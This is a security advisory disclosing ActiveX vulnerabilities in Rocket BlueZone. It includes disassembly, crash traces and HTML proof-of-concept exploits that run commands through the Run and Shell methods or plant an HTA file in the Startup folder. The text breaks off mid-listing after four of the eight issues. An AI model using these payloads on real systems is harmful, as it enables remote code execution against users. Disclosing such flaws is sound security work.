SSD Advisory – Rocket BlueZone Multiple Vulnerabilities

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) helps researchers turn their vulnerability discovery skills into a highly paid career. Contact SSD to get the most for your hard work.
Introduction
Rocket BlueZone Terminal Emulation Suite is the solution you need if you are looking to replace your aging, expensive, current Terminal Emulation solution. Our software is a secure, slim, powerhouse of a solution built for the IBM Mainframe (TN3270), i Series (TN5250), UNIX/DEC (VT), Unisys (T27 & UTS) and secure File Transfer Protocol (FTP) systems.
Vulnerability Details
Multiple vulnerabilities have been found in Rocket BlueZone:

  • WhllObj ActiveX Control Run Method Command Execution
  • WhllObj ActiveX Control Shell Method Command Execution
  • LIPI ActiveX Control SaveSettings Method Code Execution
  • WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
  • WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
  • WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
  • LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
  • LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability

WhllObj ActiveX Control Run Method Command Execution
BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
This ActiveX control offers the insecure Run() method, see typelib:

...
	/* DISPID=17 */
	/* VT_INT [22] */
	function Run(
		/* VT_BSTR [8] [in] */ $CmdLine
		)
	{
		/* method Run */
	}
...

The ActiveX calls CreateProcessA() with user supplied command line parameters. As attachment, proof of concept code which launch calc.exe.

Call stack of thread 000042E8
Address    Returns to    Procedure / arguments                               Called from                   Frame      Stack Dump
015ED028   03044ABB      kernel32.CreateProcessA                             bzwhll.03044AB5               015ED0AC
015ED02C   00000000        ModuleFileName = NULL
015ED030   015ED0CC        CommandLine = "cmd /c start calc"
015ED034   00000000        pProcessSecurity = NULL
015ED038   00000000        pThreadSecurity = NULL
015ED03C   00000000        InheritHandles = FALSE
015ED040   00000000        CreationFlags = 0
015ED044   00000000        pEnvironment = NULL
015ED048   00000000        CurrentDir = NULL
015ED04C   015ED058        pStartupInfo = 015ED058
015ED050   015ED09C        pProcessInfo = 015ED09C
015ED0B0   03059CA0      ? bzwhll.03044A8E                                   bzwhll.03059C9B
015ED1D8   77135CF9      Includes bzwhll.03059CA0                            OLEAUT32.77135CF7             015ED1D4   03200048 003DEEB
015ED1F8   77136308      ? OLEAUT32.DispCallFunc                             OLEAUT32.77136303             015ED1F4   03200048 0000005
015ED288   03042493      Includes OLEAUT32.77136308                          bzwhll.03042490               015ED284   02D3E324 0320004
015ED2B4   3C61302B      Includes bzwhll.03042493                            mshtml.3C613028               015ED2B0   03200048 0000001
015ED2F0   3C956B7D      mshtml.3C612FEE                                     mshtml.3C956B78               015ED2EC   03200048 0000001
015ED320   3C95350A      mshtml.3C956A4B                                     mshtml.3C953505               015ED31C   80020003 0000001
015ED34C   3C5FA571      Includes mshtml.3C95350A                            mshtml.3C5FA56E               015ED348   02B10400 0000001
015ED39C   3D7C3A8A      Includes mshtml.3C5FA571                            3D7C3A88                      015ED398   02D64860 0000001
015ED3DC   3D7C39D6      3D7C39FC                                            3D7C39D1                      015ED3D8   003DC708 0000001
015ED418   3D7C4F16      3D7C3987                                            3D7C4F11                      015ED414   003DC708 0000040
015ED4D8   3D7C4E70      ? 3D7C4E7E                                          3D7C4E6B                      015ED4D4   00000011 0000000
015ED50C   3D7C2D5D      3D7C244D                                            3D7C2D58                      015ED508   003DC708 015ED53
015ED558   3D7C4225      3D7C2CEA                                            3D7C4220                      015ED554   003DC708 0000000
015ED588   3D7C4F83      3D7C22E8                                            3D7C4F7E                      015ED584   003DC708 0000000
015ED724   3D7C139B      3D7C0DC6                                            3D7C1396                      015ED720   015ED738 015ED88
015ED80C   3D7C12D5      3D7C12FC                                            3D7C12D0                      015ED808   015ED880 0000000
015ED858   3D7C1103      Includes 3D7C12D5                                   3D7C1101                      015ED854   015ED880 0000000
015ED8D4   3D7A3EA3      3D7C0FB9                                            3D7A3E9E                      015ED8D0   003DDF60 015EDA9
015ED920   3D7A553F      ? 3D7A3D03                                          3D7A553A                      015ED91C   003DC3F0 015EDA9
015ED984   3D7A534D      3D7A5356                                            3D7A5348                      015ED980   003DC3F0 001DD2E
015ED9AC   3C53A47F      Includes 3D7A534D                                   mshtml.3C53A47C               015ED9A8   003DC3F4 0024EB7
015EDA04   3C53A1F1      mshtml.3C53A2F0                                     mshtml.3C53A1EC               015EDA00   02B250A0 0000000
015EDAC8   3C53A612      ? mshtml.3C53A233                                   mshtml.3C53A60D               015EDAC4
vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 10004A8E                           SUB_L10004A8E:
 10004A8E  55                        		push	ebp
 10004A8F  8BEC                      		mov	ebp,esp
 10004A91  83EC54                    		sub	esp,00000054h
 10004A94  56                        		push	esi
 10004A95  8D45AC                    		lea	eax,[ebp-54h]
 10004A98  50                        		push	eax
 10004A99  33F6                      		xor	esi,esi
 10004A9B  FF1570300310              		call	[KERNEL32.dll!GetStartupInfoA]
 10004AA1  8D45F0                    		lea	eax,[ebp-10h]
 10004AA4  50                        		push	eax
 10004AA5  8D45AC                    		lea	eax,[ebp-54h]
 10004AA8  50                        		push	eax
 10004AA9  FF7508                    		push	[ebp+08h]
 10004AAC  56                        		push	esi
 10004AAD  56                        		push	esi
 10004AAE  56                        		push	esi
 10004AAF  56                        		push	esi
 10004AB0  56                        		push	esi
 10004AB1  FF750C                    		push	[ebp+0Ch]
 10004AB4  56                        		push	esi
 10004AB5  FF156C300310              		call	[KERNEL32.dll!CreateProcessA] //boom
 10004ABB  85C0                      		test	eax,eax
 10004ABD  740E                      		jz 	L10004ACD
 10004ABF  8B75FC                    		mov	esi,[ebp-04h]
 10004AC2  6AFF                      		push	FFFFFFFFh
 10004AC4  FF75F0                    		push	[ebp-10h]
 10004AC7  FF1528330310              		call	[USER32.dll!WaitForInputIdle]
 10004ACD                           L10004ACD:
 10004ACD  8BC6                      		mov	eax,esi
 10004ACF  5E                        		pop	esi
 10004AD0  C9                        		leave
 10004AD1  C3                        		retn
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Run("cmd /c start calc");
</script>

WhllObj ActiveX Control Shell Method Command Execution
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
this ActiveX control offers the insecure Shell() method, see typelib:

...
	/* DISPID=106 */
	/* VT_INT [22] */
	function Shell(
		/* VT_BSTR [8] [in] */ $Application,
		/* VT_VARIANT [12] [in] */ $CommandLine,
		/* VT_VARIANT [12] [in] */ $WindowState,
		/* VT_VARIANT [12] [in] */ $Wait
		)
	{
		/* method Shell */
	}
...

The ActiveX calls CreateProcessA() with user supplied command line parameters. As attachment, proof of concept code which launch calc.exe.

Call stack of thread 000041C4
Address    Returns to    Procedure / arguments                                                                     Called from                   Frame      Stack Dump
015EAC2C   030F8215      kernel32.CreateProcessA                                                                   bzwhll.030F820F               015EACE4
015EAC30   00000000        ModuleFileName = NULL
015EAC34   015EAD1C        CommandLine = ""d:\windows\system32\cmd.exe"  /c start calc"
015EAC38   00000000        pProcessSecurity = NULL
015EAC3C   00000000        pThreadSecurity = NULL
015EAC40   00000000        InheritHandles = FALSE
015EAC44   00000000        CreationFlags = 0
015EAC48   00000000        pEnvironment = NULL
015EAC4C   00000000        CurrentDir = NULL
015EAC50   015EAC64        pStartupInfo = 015EAC64
015EAC54   015EACA8        pProcessInfo = 015EACA8
vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 10028059                           L10028059:
 10028059  55                       		db	55h;   'U'
 1002805A  8D                       		db	8Dh;   '?'
 1002805B  AC                       		db	ACh;   '¿'
 1002805C  24                       		db	24h;   '$'
 1002805D  40                       		db	40h;   '@'
 1002805E  DB                       		db	DBh;   '›'
 1002805F  FF                       		db	FFh;   'ï'
 10028060  FF                       		db	FFh;   'ï'
 10028061  B8                       		db	B8h;   'ñ'
 10028062  40                       		db	40h;   '@'
 10028063  25                       		db	25h;   '%'
 10028064  00                       		db	00h;
 10028065  00                       		db	00h;
 10028066  E8                       		db	E8h;   '¨'
 10028067  F5                       		db	F5h;   'å'
 10028068  8B                       		db	8Bh;   '<'
 10028069  00                       		db	00h;
 1002806A  00                       		db	00h;
 1002806B  A1                       		db	A1h;   'ö'
 1002806C  F4EC0410                 		dd	L1004ECF4
 10028070  33                       		db	33h;   '3'
 10028071  C5                       		db	C5h;   '…'
 10028072  89                       		db	89h;   '%'
 10028073  85                       		db	85h;   ':'
 10028074  BC                       		db	BCh;   '?'
 10028075  24                       		db	24h;   '$'
 10028076  00                       		db	00h;
 10028077  00                       		db	00h;
 10028078  53                        		push	ebx
 10028079  56                        		push	esi
 1002807A  57                        		push	edi
 1002807B  8DB5E0240000              		lea	esi,[ebp+000024E0h]
 10028081  8D7D10                    		lea	edi,[ebp+10h]
 10028084  A5                        		movsd
 10028085  A5                        		movsd
 10028086  A5                        		movsd
 10028087  8B85CC240000              		mov	eax,[ebp+000024CCh]
 1002808D  8B9DC8240000              		mov	ebx,[ebp+000024C8h]
 10028093  A5                        		movsd
 10028094  8DB5F0240000              		lea	esi,[ebp+000024F0h]
 1002809A  8D7D28                    		lea	edi,[ebp+28h]
 1002809D  A5                        		movsd
 1002809E  A5                        		movsd
 1002809F  A5                        		movsd
 100280A0  A5                        		movsd
 100280A1  8BBD00250000              		mov	edi,[ebp+00002500h]
 100280A7  33F6                      		xor	esi,esi
 100280A9  3935A4F50410              		cmp	[L1004F5A4],esi
 100280AF  894524                    		mov	[ebp+24h],eax
 100280B2  897D20                    		mov	[ebp+20h],edi
 100280B5  740D                      		jz 	L100280C4
 100280B7  53                        		push	ebx
 100280B8  68C8EA0310                		push	SSZ1003EAC8_WhllObj__Shell_____
 100280BD  E895B4FEFF                		call	SUB_L10013557
 100280C2  59                        		pop	ecx
 100280C3  59                        		pop	ecx
 100280C4                           L100280C4:
 100280C4  8D4580                    		lea	eax,[ebp-80h]
 100280C7  50                        		push	eax
 100280C8  C685B823000000            		mov	byte ptr [ebp+000023B8h],00h
 100280CF  C685C013000000            		mov	byte ptr [ebp+000013C0h],00h
 100280D6  FF1570300310              		call	[KERNEL32.dll!GetStartupInfoA]
 100280DC  56                        		push	esi
 100280DD  56                        		push	esi
 100280DE  6804010000                		push	00000104h
 100280E3  8D85B8230000              		lea	eax,[ebp+000023B8h]
 100280E9  50                        		push	eax
 100280EA  6AFF                      		push	FFFFFFFFh
 100280EC  FF7524                    		push	[ebp+24h]
 100280EF  56                        		push	esi
 100280F0  56                        		push	esi
 100280F1  FF156C310310              		call	[KERNEL32.dll!WideCharToMultiByte]
 100280F7  83F801                    		cmp	eax,00000001h
 100280FA  7F10                      		jg 	L1002810C
 100280FC  6A02                      		push	00000002h
 100280FE  58                        		pop	eax
 100280FF  8983F7050000              		mov	[ebx+000005F7h],eax
 10028105  8907                      		mov	[edi],eax
 10028107  E99F010000                		jmp	L100282AB
 1002810C                           L1002810C:
 1002810C  8D85D0240000              		lea	eax,[ebp+000024D0h]
 10028112  50                        		push	eax
 10028113  E8A0B7FEFF                		call	SUB_L100138B8
 10028118  84C0                      		test	al,al
 1002811A  59                        		pop	ecx
 1002811B  7422                      		jz 	L1002813F
 1002811D  68F60F0000                		push	00000FF6h
 10028122  8D85C0130000              		lea	eax,[ebp+000013C0h]
 10028128  50                        		push	eax
 10028129  8D85D0240000              		lea	eax,[ebp+000024D0h]
 1002812F  50                        		push	eax
 10028130  C685C013000000            		mov	byte ptr [ebp+000013C0h],00h
 10028137  E897B5FEFF                		call	SUB_L100136D3
 1002813C  83C40C                    		add	esp,0000000Ch
 1002813F                           L1002813F:
 1002813F  66837D100A                		cmp	word ptr [ebp+10h],000Ah
 10028144  7420                      		jz 	L10028166
 10028146  66F745100040              		test	word ptr [ebp+10h],4000h
 1002814C  7407                      		jz 	L10028155
 1002814E  8B4518                    		mov	eax,[ebp+18h]
 10028151  8A00                      		mov	al,[eax]
 10028153  EB03                      		jmp	L10028158
 10028155                           L10028155:
 10028155  8A4518                    		mov	al,[ebp+18h]
 10028158                           L10028158:
 10028158  FEC0                      		inc	al
 1002815A  834DAC01                  		or	dword ptr [ebp-54h],00000001h
 1002815E  660FB6C0                  		movzx	ax,al
 10028162  668945B0                  		mov	[ebp-50h],ax
 10028166                           L10028166:
 10028166  685CE60310                		push	L1003E65C
 1002816B  8D4538                    		lea	eax,[ebp+38h]
 1002816E  50                        		push	eax
 1002816F  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 10028175  8B3D60300310              		mov	edi,[KERNEL32.dll!lstrcatA]
 1002817B  8D85B8230000              		lea	eax,[ebp+000023B8h]
 10028181  50                        		push	eax
 10028182  8D4538                    		lea	eax,[ebp+38h]
 10028185  50                        		push	eax
 10028186  FFD7                      		call	edi
 10028188  685CE60310                		push	L1003E65C
 1002818D  8D4538                    		lea	eax,[ebp+38h]
 10028190  50                        		push	eax
 10028191  FFD7                      		call	edi
 10028193  80BDC013000000            		cmp	byte ptr [ebp+000013C0h],00h
 1002819A  7418                      		jz 	L100281B4
 1002819C  6868850310                		push	L10038568
 100281A1  8D4538                    		lea	eax,[ebp+38h]
 100281A4  50                        		push	eax
 100281A5  FFD7                      		call	edi
 100281A7  8D85C0130000              		lea	eax,[ebp+000013C0h]
 100281AD  50                        		push	eax
 100281AE  8D4538                    		lea	eax,[ebp+38h]
 100281B1  50                        		push	eax
 100281B2  FFD7                      		call	edi
 100281B4                           L100281B4:
 100281B4  8D4538                    		lea	eax,[ebp+38h]
 100281B7  8945E4                    		mov	[ebp-1Ch],eax
 100281BA  8D45D4                    		lea	eax,[ebp-2Ch]
 100281BD  50                        		push	eax
 100281BE  C745D43C000000            		mov	dword ptr [ebp-2Ch],0000003Ch
 100281C5  C745D840050000            		mov	dword ptr [ebp-28h],00000540h
 100281CC  8975DC                    		mov	[ebp-24h],esi
 100281CF  C745E0C0EA0310            		mov	dword ptr [ebp-20h],SSZ1003EAC0_Open
 100281D6  8975E8                    		mov	[ebp-18h],esi
 100281D9  8975EC                    		mov	[ebp-14h],esi
 100281DC  C745F001000000            		mov	dword ptr [ebp-10h],00000001h
 100281E3  FF15C0320310              		call	[SHELL32.dll!ShellExecuteExA]
 100281E9  8B7D20                    		mov	edi,[ebp+20h]
 100281EC  8983F7050000              		mov	[ebx+000005F7h],eax
 100281F2  8907                      		mov	[edi],eax
 100281F4  39B3F7050000              		cmp	[ebx+000005F7h],esi
 100281FA  756F                      		jnz	L1002826B
 100281FC  8D45C4                    		lea	eax,[ebp-3Ch]
 100281FF  50                        		push	eax
 10028200  8D4580                    		lea	eax,[ebp-80h]
 10028203  50                        		push	eax
 10028204  56                        		push	esi
 10028205  56                        		push	esi
 10028206  56                        		push	esi
 10028207  56                        		push	esi
 10028208  56                        		push	esi
 10028209  56                        		push	esi
 1002820A  8D4538                    		lea	eax,[ebp+38h]
 1002820D  50                        		push	eax
 1002820E  56                        		push	esi
 1002820F  FF156C300310              		call	[KERNEL32.dll!CreateProcessA] //boom
 10028215  8983F7050000              		mov	[ebx+000005F7h],eax
 1002821B  8907                      		mov	[edi],eax
 1002821D  39B3F7050000              		cmp	[ebx+000005F7h],esi
 10028223  0F8482000000              		jz 	L100282AB
 10028229  66837D280A                		cmp	word ptr [ebp+28h],000Ah
 1002822E  747B                      		jz 	L100282AB
 10028230  66F745280040              		test	word ptr [ebp+28h],4000h
 10028236  7407                      		jz 	L1002823F
 10028238  8B4530                    		mov	eax,[ebp+30h]
 1002823B  8A00                      		mov	al,[eax]
 1002823D  EB03                      		jmp	L10028242
 1002823F                           L1002823F:
 1002823F  8A4530                    		mov	al,[ebp+30h]
 10028242                           L10028242:
 10028242  84C0                      		test	al,al
 10028244  7465                      		jz 	L100282AB
 10028246  EB18                      		jmp	L10028260
 10028248                           L10028248:
 10028248  6A64                      		push	00000064h
 1002824A  FF75C4                    		push	[ebp-3Ch]
 1002824D  FF1508310310              		call	[KERNEL32.dll!WaitForSingleObject]
 10028253  85C0                      		test	eax,eax
 10028255  7454                      		jz 	L100282AB
 10028257  6A01                      		push	00000001h
 10028259  8BCB                      		mov	ecx,ebx
 1002825B  E848EBFFFF                		call	SUB_L10026DA8
 10028260                           L10028260:
 10028260  80BB8656000000            		cmp	byte ptr [ebx+00005686h],00h
 10028267  74DF                      		jz 	L10028248
 10028269  EB40                      		jmp	L100282AB
 1002826B                           L1002826B:
 1002826B  66837D280A                		cmp	word ptr [ebp+28h],000Ah
 10028270  7439                      		jz 	L100282AB
 10028272  66F745280040              		test	word ptr [ebp+28h],4000h
 10028278  7407                      		jz 	L10028281
 1002827A  8B4530                    		mov	eax,[ebp+30h]
 1002827D  8A00                      		mov	al,[eax]
 1002827F  EB03                      		jmp	L10028284
 10028281                           L10028281:
 10028281  8A4530                    		mov	al,[ebp+30h]
 10028284                           L10028284:
 10028284  84C0                      		test	al,al
 10028286  7423                      		jz 	L100282AB
 10028288  EB18                      		jmp	L100282A2
 1002828A                           L1002828A:
 1002828A  6A64                      		push	00000064h
 1002828C  FF750C                    		push	[ebp+0Ch]
 1002828F  FF1508310310              		call	[KERNEL32.dll!WaitForSingleObject]
 10028295  85C0                      		test	eax,eax
 10028297  7412                      		jz 	L100282AB
 10028299  6A01                      		push	00000001h
 1002829B  8BCB                      		mov	ecx,ebx
 1002829D  E806EBFFFF                		call	SUB_L10026DA8
 100282A2                           L100282A2:
 100282A2  80BB8656000000            		cmp	byte ptr [ebx+00005686h],00h
 100282A9  74DF                      		jz 	L1002828A
 100282AB                           L100282AB:
 100282AB  8B8DBC240000              		mov	ecx,[ebp+000024BCh]
 100282B1  5F                        		pop	edi
 100282B2  5E                        		pop	esi
 100282B3  33CD                      		xor	ecx,ebp
 100282B5  33C0                      		xor	eax,eax
 100282B7  5B                        		pop	ebx
 100282B8  E88F890000                		call	SUB_L10030C4C
 100282BD  81C5C0240000              		add	ebp,000024C0h
 100282C3  C9                        		leave
 100282C4  C23C00                    		retn	003Ch
;----------------------------------------------------------------------------------------------------

Proof of Concept

<HTML>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Shell("c:\\windows\\system32\\cmd.exe"," /c start calc",1,1);
</script>

LIPI ActiveX Control SaveSettings Method Code Execution
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
This ActiveX control offers the insecure SaveSettings() method, see typelib:

...
	/* DISPID=4 */
	/* VT_I4 [3] */
	function SaveSettings(
		/* VT_BSTR [8] [in] */ $__MIDL_0019
		)
	{
		/* method SaveSettings */
	}
...

This method simply accepts a file name as argument and can be used to save arbitrary files into target computers. Also directory traversal sequences can be used. File content can be controlled by setting the ‘Username’ property.
Given this, a remote attacker could store an executable hta file inside automatic startup folders. As attachment, proof of concept code which launches calc.exe at the computer reboot.
Proof of Concept

<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
obj.Username = ">>>>>>>>>>>>>>><sc" + "ript>var x=new ActiveXObject(\"WScript.Shell\");x.Exec(\"calc.exe\");</sc" + "ript>";
obj.SaveSettings("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta");
</script>

WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow to script the methods and properties of the object according to the browser security settings. Note that the ActiveX settings are the same of common web browser plugins (Flash, Quicktime, etc.).
Vulnerability
The ActiveX offers the StatusBarText property, see typelib:

...
/* DISPID=154 */
	/* VT_BSTR [8] */
	/* property StatusBarText */
	var $StatusBarText;
	/* DISPID=154 */
	/* property StatusBarText */
	var $StatusBarText;
...

This property suffer of a stack based buffer overflow because of a copy loop inside bzwhll.dll. See vulnerable code below.

WinDBG shows:
(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02ca6a64 ebx=00002f0c ecx=00000041 edx=00000074 esi=7c813e21 edi=03550048
eip=0273e548 esp=015ecdd4 ebp=015ed1f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
bzwhll!DllGetClassObject+0x12a8d:
0273e548 888c1dfcfeffff  mov     byte ptr [ebp+ebx-104h],cl ss:0023:015f0000=4d
0:008> g
(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015eca04 ebp=015eca24 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
vulnerable code, bzwhll.dll
;----------------------------------------------------------------------------------------------------
 1001E379                           L1001E379:
 1001E379  55                        		push	ebp
 1001E37A  8BEC                      		mov	ebp,esp
 1001E37C  81EC18040000              		sub	esp,00000418h
 1001E382  A1F4EC0410                		mov	eax,[L1004ECF4]
 1001E387  33C5                      		xor	eax,ebp
 1001E389  8945FC                    		mov	[ebp-04h],eax
 1001E38C  53                        		push	ebx
 1001E38D  56                        		push	esi
 1001E38E  33DB                      		xor	ebx,ebx
 1001E390  391DA4F50410              		cmp	[L1004F5A4],ebx
 1001E396  57                        		push	edi
 1001E397  8B7D08                    		mov	edi,[ebp+08h]
 1001E39A  740D                      		jz 	L1001E3A9
 1001E39C  57                        		push	edi
 1001E39D  6820C10310                		push	SSZ1003C120_WhllObj__put_StatusBarText_____
 1001E3A2  E8B051FFFF                		call	SUB_L10013557
 1001E3A7  59                        		pop	ecx
 1001E3A8  59                        		pop	ecx
 1001E3A9                           L1001E3A9:
 1001E3A9  6800010000                		push	00000100h
 1001E3AE  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E3B4  53                        		push	ebx
 1001E3B5  50                        		push	eax
 1001E3B6  E8D1280100                		call	jmp_MSVCR80.dll!memset
 1001E3BB  8B450C                    		mov	eax,[ebp+0Ch]
 1001E3BE  83C40C                    		add	esp,0000000Ch
 1001E3C1  663918                    		cmp	[eax],bx
 1001E3C4  0F8492010000              		jz 	L1001E55C
 1001E3CA  8B3560300310              		mov	esi,[KERNEL32.dll!lstrcatA]
 1001E3D0                           L1001E3D0:
 1001E3D0  66833826                  		cmp	word ptr [eax],0026h     \ //scan for ampersand
 1001E3D4  0F856C010000              		jnz	L1001E546                /
 1001E3DA  83C002                    		add	eax,00000002h
 1001E3DD  8985F8FBFFFF              		mov	[ebp-00000408h],eax
 1001E3E3  0FB700                    		movzx	eax,[eax]
 1001E3E6  83F86F                    		cmp	eax,0000006Fh
 1001E3E9  0F8FE7000000              		jg 	L1001E4D6
 1001E3EF  0F84D3000000              		jz 	L1001E4C8
 1001E3F5  83E826                    		sub	eax,00000026h
 1001E3F8  0F84C3000000              		jz 	L1001E4C1
 1001E3FE  83E83D                    		sub	eax,0000003Dh
 1001E401  0F849D000000              		jz 	L1001E4A4
 1001E407  48                        		dec	eax
 1001E408  7463                      		jz 	L1001E46D
 1001E40A  48                        		dec	eax
 1001E40B  48                        		dec	eax
 1001E40C  7430                      		jz 	L1001E43E
 1001E40E  48                        		dec	eax
 1001E40F  48                        		dec	eax
 1001E410  7412                      		jz 	L1001E424
 1001E412  83E804                    		sub	eax,00000004h
 1001E415  0F8514010000              		jnz	L1001E52F
 1001E41B                           L1001E41B:
 1001E41B  8D477B                    		lea	eax,[edi+7Bh]
 1001E41E                           L1001E41E:
 1001E41E  50                        		push	eax
 1001E41F  E902010000                		jmp	L1001E526
 1001E424                           L1001E424:
 1001E424  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E42A  51                        		push	ecx
 1001E42B  6A05                      		push	00000005h
 1001E42D                           L1001E42D:
 1001E42D  8B07                      		mov	eax,[edi]
 1001E42F  57                        		push	edi
 1001E430  FF907C070000              		call	[eax+0000077Ch]
 1001E436                           L1001E436:
 1001E436  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E43C  EBE0                      		jmp	L1001E41E
 1001E43E                           L1001E43E:
 1001E43E  8B07                      		mov	eax,[edi]
 1001E440  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E446  51                        		push	ecx
 1001E447  6A08                      		push	00000008h
 1001E449  57                        		push	edi
 1001E44A  FF907C070000              		call	[eax+0000077Ch]
 1001E450  80BDFCFDFFFF00            		cmp	byte ptr [ebp-00000204h],00h
 1001E457  75DD                      		jnz	L1001E436
 1001E459  6814C10310                		push	SSZ1003C114_Untitled
 1001E45E  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E464  50                        		push	eax
 1001E465  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 1001E46B  EBC9                      		jmp	L1001E436
 1001E46D                           L1001E46D:
 1001E46D  8D85E8FBFFFF              		lea	eax,[ebp-00000418h]
 1001E473  50                        		push	eax
 1001E474  FF15A8300310              		call	[KERNEL32.dll!GetLocalTime]
 1001E47A  6800010000                		push	00000100h
 1001E47F  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E485  50                        		push	eax
 1001E486  6800C10310                		push	SSZ1003C100_ddd__MMM_dd_yyyy
 1001E48B  8D85E8FBFFFF              		lea	eax,[ebp-00000418h]
 1001E491  50                        		push	eax
 1001E492  6800000040                		push	40000000h
 1001E497  6800040000                		push	00000400h
 1001E49C  FF15EC300310              		call	[KERNEL32.dll!GetTimeFormatA]
 1001E4A2  EB92                      		jmp	L1001E436
 1001E4A4                           L1001E4A4:
 1001E4A4  80BFC605000000            		cmp	byte ptr [edi+000005C6h],00h
 1001E4AB  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E4B1  7407                      		jz 	L1001E4BA
 1001E4B3  68F4C00310                		push	SSZ1003C0F4_Connected
 1001E4B8  EB72                      		jmp	L1001E52C
 1001E4BA                           L1001E4BA:
 1001E4BA  68E4C00310                		push	SSZ1003C0E4_Disconnected
 1001E4BF  EB6B                      		jmp	L1001E52C
 1001E4C1                           L1001E4C1:
 1001E4C1  68E0C00310                		push	L1003C0E0
 1001E4C6  EB5E                      		jmp	L1001E526
 1001E4C8                           L1001E4C8:
 1001E4C8  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E4CE  51                        		push	ecx
 1001E4CF  6A08                      		push	00000008h
 1001E4D1  E957FFFFFF                		jmp	L1001E42D
 1001E4D6                           L1001E4D6:
 1001E4D6  83E872                    		sub	eax,00000072h
 1001E4D9  7446                      		jz 	L1001E521
 1001E4DB  48                        		dec	eax
 1001E4DC  741C                      		jz 	L1001E4FA
 1001E4DE  48                        		dec	eax
 1001E4DF  7412                      		jz 	L1001E4F3
 1001E4E1  48                        		dec	eax
 1001E4E2  48                        		dec	eax
 1001E4E3  0F8432FFFFFF              		jz 	L1001E41B
 1001E4E9  48                        		dec	eax
 1001E4EA  7543                      		jnz	L1001E52F
 1001E4EC  68D8C00310                		push	SSZ1003C0D8_Seagull
 1001E4F1  EB33                      		jmp	L1001E526
 1001E4F3                           L1001E4F3:
 1001E4F3  68D0C00310                		push	SSZ1003C0D0_Telnet
 1001E4F8  EB2C                      		jmp	L1001E526
 1001E4FA                           L1001E4FA:
 1001E4FA  8A87C7050000              		mov	al,[edi+000005C7h]
 1001E500  84C0                      		test	al,al
 1001E502  7507                      		jnz	L1001E50B
 1001E504  68BCC00310                		push	SSZ1003C0BC_IBM_3270_Terminal
 1001E509  EB1B                      		jmp	L1001E526
 1001E50B                           L1001E50B:
 1001E50B  3C01                      		cmp	al,01h
 1001E50D  7507                      		jnz	L1001E516
